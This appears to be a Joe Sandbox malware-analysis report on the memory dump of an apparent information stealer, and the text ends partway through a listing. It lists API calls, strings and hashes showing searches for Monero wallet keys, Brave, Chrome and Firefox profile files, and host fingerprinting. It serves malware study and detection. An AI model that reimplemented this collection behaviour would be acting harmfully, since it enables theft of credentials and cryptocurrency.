                                • Instruction ID: 873e4ff55918f082ae5aae43023d43f9e2edd0cfa019c4baa9bacc7c17c00db5
                                • Opcode Fuzzy Hash: 0d5bfa169150748f779b0db5ded73382effa1e5a46a9d92c667138c07ba68596
                                • Instruction Fuzzy Hash: BFE0E670B4530CFFE720ABA09C0AB597AB8AB04B15F105195F709775C4D6B926409799
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E110B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E110F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 77a5bbf6874e929f842d20829489338ab2a7804e1a68b34a0666aca2078460f6
                                • Instruction ID: 141db8648e8a5b6d8481a79946716c5256b91321c362f2b27fbeccb894b14c3d
                                • Opcode Fuzzy Hash: 77a5bbf6874e929f842d20829489338ab2a7804e1a68b34a0666aca2078460f6
                                • Instruction Fuzzy Hash: 2FF0E271A41318BBE7149AA4AC49FFFB7E8E709B15F301588F644E3280D5729E40CBA0
                                APIs
                                  • Part of subcall function 00E278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27910
                                  • Part of subcall function 00E278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27917
                                  • Part of subcall function 00E278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E2792F
                                  • Part of subcall function 00E27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27880
                                  • Part of subcall function 00E27850: RtlAllocateHeap.NTDLL(00000000), ref: 00E27887
                                  • Part of subcall function 00E27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E2789F
                                • ExitProcess.KERNEL32 ref: 00E111C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 42f54d6f1ff71752840401f46cc3b41cc653137bdc1db36c03871a163ab694dd
                                • Instruction ID: 81d9630e1aae23aa4dc580a278ff5b73e2c30a7aff7e3ede8204dd720138c727
                                • Opcode Fuzzy Hash: 42f54d6f1ff71752840401f46cc3b41cc653137bdc1db36c03871a163ab694dd
                                • Instruction Fuzzy Hash: 7FE012B5F15325A7CB1473B0BD0BB2B76DC5B14349F042524FA45F3102FE2AE8408665
                                APIs
                                • wsprintfA.USER32 ref: 00E238CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E238E3
                                • lstrcat.KERNEL32(?,?), ref: 00E23935
                                • StrCmpCA.SHLWAPI(?,00E30F70), ref: 00E23947
                                • StrCmpCA.SHLWAPI(?,00E30F74), ref: 00E2395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E23C67
                                • FindClose.KERNEL32(000000FF), ref: 00E23C7C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: f9fb3305bb24e53c2c63ae64be95f9861bbf65fa520be5bf9b7c57342aa2ff85
                                • Instruction ID: fad0990cd6d050bd3c8f7cb758387aa08c68549140ef813b593c2ecdb9a9b5cc
                                • Opcode Fuzzy Hash: f9fb3305bb24e53c2c63ae64be95f9861bbf65fa520be5bf9b7c57342aa2ff85
                                • Instruction Fuzzy Hash: 37A122B1A003189BDB34DF64DC89FFA77B9BB88300F044598A64DA7145DB799B84CF61
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00E30B32,00E30B2B,00000000,?,?,?,00E313F4,00E30B2A), ref: 00E1BEF5
                                • StrCmpCA.SHLWAPI(?,00E313F8), ref: 00E1BF4D
                                • StrCmpCA.SHLWAPI(?,00E313FC), ref: 00E1BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00E1C7D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: fa1eead52c740f69c23433a8022016111859af6e83c17f494a1001a3d2276f9c
                                • Instruction ID: b467aa9e8730c3981711ea10e869e2a36eac309b5e6e7a5419696b258e04f643
                                • Opcode Fuzzy Hash: fa1eead52c740f69c23433a8022016111859af6e83c17f494a1001a3d2276f9c
                                • Instruction Fuzzy Hash: 5C4244729101189BCB18FB70ED96EEE73BDAF88300F445569F506B7181EE349B49CB92
                                APIs
                                • wsprintfA.USER32 ref: 00E2492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E24943
                                • StrCmpCA.SHLWAPI(?,00E30FDC), ref: 00E24971
                                • StrCmpCA.SHLWAPI(?,00E30FE0), ref: 00E24987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E24B7D
                                • FindClose.KERNEL32(000000FF), ref: 00E24B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: ef0033eae0076475ebb8a73f346435a5cd72c14bbfb32911dd0439ef9018629e
                                • Instruction ID: 0df8509b7d43ca7796b9a6b06a4db53a57f5f977b93ebe27ba8ce32c7fac6efc
                                • Opcode Fuzzy Hash: ef0033eae0076475ebb8a73f346435a5cd72c14bbfb32911dd0439ef9018629e
                                • Instruction Fuzzy Hash: 6F614AB1600318ABCB34EBA0EC49EFB77BCBB48700F044698B649A7145EB759785CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E24580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E24587
                                • wsprintfA.USER32 ref: 00E245A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E245BD
                                • StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E245EB
                                • StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2468B
                                • FindClose.KERNEL32(000000FF), ref: 00E246A0
                                • lstrcat.KERNEL32(?,008FE520), ref: 00E246C5
                                • lstrcat.KERNEL32(?,008FD5B8), ref: 00E246D8
                                • lstrlen.KERNEL32(?), ref: 00E246E5
                                • lstrlen.KERNEL32(?), ref: 00E246F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 470b211d5960f3594c3677fa2c6c37a282dc993530902d505cd876b1c064c448
                                • Instruction ID: 46be5967a9ef630259e99679ac56e5ef86d931bae752b1723908ef22a290d51d
                                • Opcode Fuzzy Hash: 470b211d5960f3594c3677fa2c6c37a282dc993530902d505cd876b1c064c448
                                • Instruction Fuzzy Hash: 7B5136B16403189BC764EB70DC89FEE777CBB58700F405688B64AA6184EB759B84CF91
                                APIs
                                • wsprintfA.USER32 ref: 00E23EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E23EDA
                                • StrCmpCA.SHLWAPI(?,00E30FAC), ref: 00E23F08
                                • StrCmpCA.SHLWAPI(?,00E30FB0), ref: 00E23F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2406C
                                • FindClose.KERNEL32(000000FF), ref: 00E24081
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 4b5305f82662e2af9a76a24f9cd3b3c7a61e7ab1eb3f07d67f735ee3dbc3a62e
                                • Instruction ID: e37ae46cad913b817dd1cf38ca4bca68008501c1edfbbef87f14dfd3f0eff7ab
                                • Opcode Fuzzy Hash: 4b5305f82662e2af9a76a24f9cd3b3c7a61e7ab1eb3f07d67f735ee3dbc3a62e
                                • Instruction Fuzzy Hash: 125136B6900318EBCB24EBB0DC85EFA73BCBB48300F445699B659A6044DB759B85CF51
                                APIs
                                • wsprintfA.USER32 ref: 00E1ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E1ED55
                                • StrCmpCA.SHLWAPI(?,00E31538), ref: 00E1EDAB
                                • StrCmpCA.SHLWAPI(?,00E3153C), ref: 00E1EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00E1F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: ee0a9b4f9c9fe91ff8472610fee7ff1547160288891c7525d2b2daa9284618d3
                                • Instruction ID: 54975bbff9bf44370452d8581c95666df66887fbc06bf3f240acf51275481c95
                                • Opcode Fuzzy Hash: ee0a9b4f9c9fe91ff8472610fee7ff1547160288891c7525d2b2daa9284618d3
                                • Instruction Fuzzy Hash: 38E110729112289BDB18EB60EC56EEE73B8AF54300F4455E9F50A72052EE706F8ACF51
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E315B8,00E30D96), ref: 00E1F71E
                                • StrCmpCA.SHLWAPI(?,00E315BC), ref: 00E1F76F
                                • StrCmpCA.SHLWAPI(?,00E315C0), ref: 00E1F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00E1FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 4f9c8f3c6ffc39df9c9072ea3dd65b312a0e57aca2256792a242fd94ceb4afde
                                • Instruction ID: e52a2680a161888cbd5d2c1df9e7022c2138183b77db2e4dd222732722ae42eb
                                • Opcode Fuzzy Hash: 4f9c8f3c6ffc39df9c9072ea3dd65b312a0e57aca2256792a242fd94ceb4afde
                                • Instruction Fuzzy Hash: 1DB136719002189BDB28FF60EC56AEE73B9AF94300F4495B9E50AB7181EF315B49CF91
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E3510C,?,?,?,00E351B4,?,?,00000000,?,00000000), ref: 00E11923
                                • StrCmpCA.SHLWAPI(?,00E3525C), ref: 00E11973
                                • StrCmpCA.SHLWAPI(?,00E35304), ref: 00E11989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E11D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00E11DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E11E20
                                • FindClose.KERNEL32(000000FF), ref: 00E11E32
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: e978330bbd6e029185a568848cc9c1066f7f955391e220369c2305c670cf5cd8
                                • Instruction ID: 0f1d9bd41494682a24523d291b536e525793f7fa7fd2a0aa70511b3955afda5f
                                • Opcode Fuzzy Hash: e978330bbd6e029185a568848cc9c1066f7f955391e220369c2305c670cf5cd8
                                • Instruction Fuzzy Hash: 9812E0729101289BDB1DFB60EC9AAEE73B8AF54300F4455A9F50672091EF706F89CF91
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E30C2E), ref: 00E1DE5E
                                • StrCmpCA.SHLWAPI(?,00E314C8), ref: 00E1DEAE
                                • StrCmpCA.SHLWAPI(?,00E314CC), ref: 00E1DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00E1E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 165e9b7053f92b5fb73f25a639a697041f66c74ea51ba8056da140ed240318e0
                                • Instruction ID: 29ddc383a21ee4f526e0f859f779770b36504b2f0f96ce3eebf02c4b3d202cba
                                • Opcode Fuzzy Hash: 165e9b7053f92b5fb73f25a639a697041f66c74ea51ba8056da140ed240318e0
                                • Instruction Fuzzy Hash: 1BF19F729141289BDB1DEB60EC95AEE73B8BF58300F4461E9F41A72051EF706B89CF51
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E314B0,00E30C2A), ref: 00E1DAEB
                                • StrCmpCA.SHLWAPI(?,00E314B4), ref: 00E1DB33
                                • StrCmpCA.SHLWAPI(?,00E314B8), ref: 00E1DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00E1DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: f91edd60a16b23e9a16494a05c6d175838209d8d7a1323b711ddfcabba946a51
                                • Instruction ID: 6886ee9d292d3b803e033a5fde1858b115ba2788f55d19de115cd30c33a782a7
                                • Opcode Fuzzy Hash: f91edd60a16b23e9a16494a05c6d175838209d8d7a1323b711ddfcabba946a51
                                • Instruction Fuzzy Hash: 109156729002149BCB18FF70FC569EE73BDAF88300F449669F946B6145EE349B49CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *J;$-e/$7n$CE+$ESnk$n,^{$xbW=$yS
                                • API String ID: 0-3276988427
                                • Opcode ID: 0c0b97c61dd462f0af491a582f0c5f61af13ca49d27e77e556a90529dfd36ff8
                                • Instruction ID: 64275b43aec34b6851db1d405ee43315342fa3344fc1ec66017b54f09a01c397
                                • Opcode Fuzzy Hash: 0c0b97c61dd462f0af491a582f0c5f61af13ca49d27e77e556a90529dfd36ff8
                                • Instruction Fuzzy Hash: 03A218F360C204AFE3046E2DEC8567ABBE9EFD4720F168A3DE6C5C7744E63558058692
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00E305AF), ref: 00E27BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E27BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E27C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E27C62
                                • LocalFree.KERNEL32(00000000), ref: 00E27D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
